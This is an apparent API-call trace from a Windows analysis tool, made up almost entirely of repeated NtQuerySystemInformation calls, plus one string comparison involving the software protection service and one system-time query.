[0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x28, ResultLength=0x0) [0228.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x28, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eaa0, Length=0x20, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea20, Length=0x20, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea20, Length=0x20, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea20, Length=0x20, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x20, ResultLength=0x0) [0228.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb10, Length=0x20, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb90, Length=0x20, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x20, ResultLength=0x0) [0228.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb20, Length=0x20, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f088, Length=0x50, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x38, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x28, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x28, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x28, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x28, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee50, Length=0x28, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x38, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x28, ResultLength=0x0) [0228.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eed0, Length=0x28, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x38, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x20, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x38, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x20, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x20, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x20, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef30, Length=0x50, ResultLength=0x0) [0228.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x38, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x28, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x28, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x28, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x28, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x28, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x38, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed80, Length=0x28, ResultLength=0x0) [0229.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed80, Length=0x28, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x38, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x20, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee60, Length=0x38, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x20, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x20, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.201] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef18, Length=0x50, ResultLength=0x0) [0229.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x38, ResultLength=0x0) [0229.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0229.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec70, Length=0x28, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ece0, Length=0x28, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x38, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed60, Length=0x28, ResultLength=0x0) [0229.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed60, Length=0x28, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x38, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0229.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x38, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x20, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x20, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751f7f0b0 | out: lpSystemTimeAsFileTime=0xc751f7f0b0*(dwLowDateTime=0xe9e3bd5a, dwHighDateTime=0x1d5fb6e)) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.864] 